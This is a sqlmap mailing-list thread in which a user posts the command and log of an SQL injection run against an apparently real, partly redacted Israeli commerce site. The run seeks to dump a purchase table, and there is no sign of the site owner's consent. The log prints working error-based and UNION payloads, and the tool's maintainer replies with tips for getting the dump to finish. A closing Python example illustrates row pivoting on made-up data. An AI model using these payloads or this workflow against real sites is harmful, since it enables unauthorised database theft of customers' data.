Discussion:
[sqlmap-users] sqlmap stuck + can not retrieve all rows in an error based sql injection
Daniel Shapira
2012-04-10 15:00:32 UTC
Hey guys,
I have a problem here,
take a look.
sqlmap almost always gets stuck with the message - [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
Even if I let it run for days it will not dump a thing;
sometimes it does retrieve some data, but out of 1000 rows it will return around 10 rows only.
Hope someone can help me with that.
Thanks
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

F:\Users\Dan>cd desktop/sqlmap

F:\Users\Dan\Desktop\sqlmap>sqlmap.py --random-agent -u http://www.xxxxxxxx.co.il:80/forgotpass.asp --data="cmdLogin==???&sEmail=1" -D camera4less -T dbo.xxxx -C xxx,xxx,xxx,xxx --dump

    sqlmap/1.0-dev (r4976) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:49:12

[17:49:13] [INFO] fetched random HTTP User-Agent header from file 'F:\Users\xxx\Desktop\sqlmap\txt\user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3
[17:49:13] [INFO] using 'F:\Users\xxx\Desktop\sqlmap\output\www.xxxxx.co.il\session' as session file
[17:49:13] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from session file
[17:49:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: sEmail
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cmdLogin==???&sEmail=1' AND 6043=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(102)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6043=6043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58))) AND 'rxzU'='rxzU

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: cmdLogin==???&sEmail=1' UNION ALL SELECT CHAR(58)+CHAR(111)+CHAR(102)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(79)+CHAR(87)+CHAR(108)+CHAR(111)+CHAR(87)+CHAR(121)+CHAR(87)+CHAR(90)+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58), NULL-- AND 'lpxC'='lpxC
---

[17:49:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 2

[17:49:17] [INFO] fetching columns 'xxx, xxx, xxx, xxx' for table 'xxx' in database 'xxx'
[17:49:17] [INFO] the SQL query used returns 4 entries
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] resumed: "xxx","varchar"
[17:49:17] [INFO] fetching entries of column(s) 'xxx, xxx, xxx, xxx' for table 'purchase' in database 'xxx'
[17:49:17] [INFO] fetching number of distinct values for column 'xxx'
[17:49:18] [INFO] fetching number of distinct values for column 'xxx'
[17:49:18] [INFO] fetching number of distinct values for column 'xxxme'
[17:49:18] [INFO] fetching number of distinct values for column 'xxx'
[17:49:18] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
Miroslav Stampar
2012-04-10 18:17:24 UTC
Hi.
Post by Daniel Shapira
Hey guys,
I have a problem here,
take a look.
sqlmap almost always gets stuck with the message - [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
This is exactly what it says. As there is no LIMIT/OFFSET mechanism in MsSQL, we use "pivoting" for retrieving data in MsSQL. Unique values for one column are retrieved, while the rest of the columns are retrieved through a "WHERE <pivot_column>=current" relation.
Post by Daniel Shapira
Even if I let it run for days it will not dump a thing;
People. If sqlmap doesn't dump anything "for minutes" then there is no need for running it "for days". In those kinds of situations options like --parse-errors or -t traffic.txt are gold.
Post by Daniel Shapira
sometimes it does retrieve some data, but out of 1000 rows it will return around 10 rows only.
Is there a way for you to send me privately the content of the traffic file for such a run? (You just have to append --fresh-queries -t traffic.txt to the end of the used commands.)

Also, it would be great if you could just try for yourself to run that case with the --no-cast switch and report back if that helped.

Kind regards,
Miroslav Stampar
--
Miroslav Stampar
http://about.me/stamparm
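
The pivoting described in the reply above, as an added example that is not part of the original thread and is not sqlmap's own code: it walks a table by ascending pivot value with a "WHERE <pivot_column>=current" lookup and shows that a pivot with duplicate values returns only one row per distinct value. Assumptions: in-memory SQLite stands in for MsSQL, and the `purchase` table contents, column names and helper functions are constructed for illustration.

```python
import sqlite3

# Constructed sample data: order_id is unique, city is not.
ROWS = [(1, "haifa", "alice"), (2, "haifa", "bob"), (3, "eilat", "carol"),
        (4, "haifa", "dave"), (5, "eilat", "erin")]
COLUMNS = ("order_id", "city", "buyer")  # fixed identifiers, never user input


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE purchase (order_id INTEGER, city TEXT, buyer TEXT)")
    db.executemany("INSERT INTO purchase VALUES (?, ?, ?)", ROWS)
    return db


def distinct_and_total(db, column):
    """Counts compared when looking for a pivot: usable only if they match."""
    assert column in COLUMNS
    return db.execute(
        f"SELECT COUNT(DISTINCT {column}), COUNT(*) FROM purchase").fetchone()


def pivot_dump(db, pivot):
    """Walk the table by ascending pivot value, one scalar per query."""
    assert pivot in COLUMNS
    others = [c for c in COLUMNS if c != pivot]
    rows, current = [], None
    while True:
        # Next pivot value: the smallest one above the value just handled.
        if current is None:
            nxt = db.execute(f"SELECT MIN({pivot}) FROM purchase").fetchone()[0]
        else:
            nxt = db.execute(
                f"SELECT MIN({pivot}) FROM purchase WHERE {pivot} > ?",
                (current,)).fetchone()[0]
        if nxt is None:
            return rows
        # "WHERE <pivot_column>=current": MIN() stands in for "one value";
        # with a duplicated pivot, every other matching row is never seen.
        rest = [db.execute(f"SELECT MIN({c}) FROM purchase WHERE {pivot} = ?",
                           (nxt,)).fetchone()[0] for c in others]
        rows.append((nxt, *rest))
        current = nxt


if __name__ == "__main__":
    db = make_db()
    for col in ("order_id", "city"):
        print(col, distinct_and_total(db, col), pivot_dump(db, col))
```

With `order_id` as pivot all five rows come back; with `city` only two do, which is the situation the warning in the log reports.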
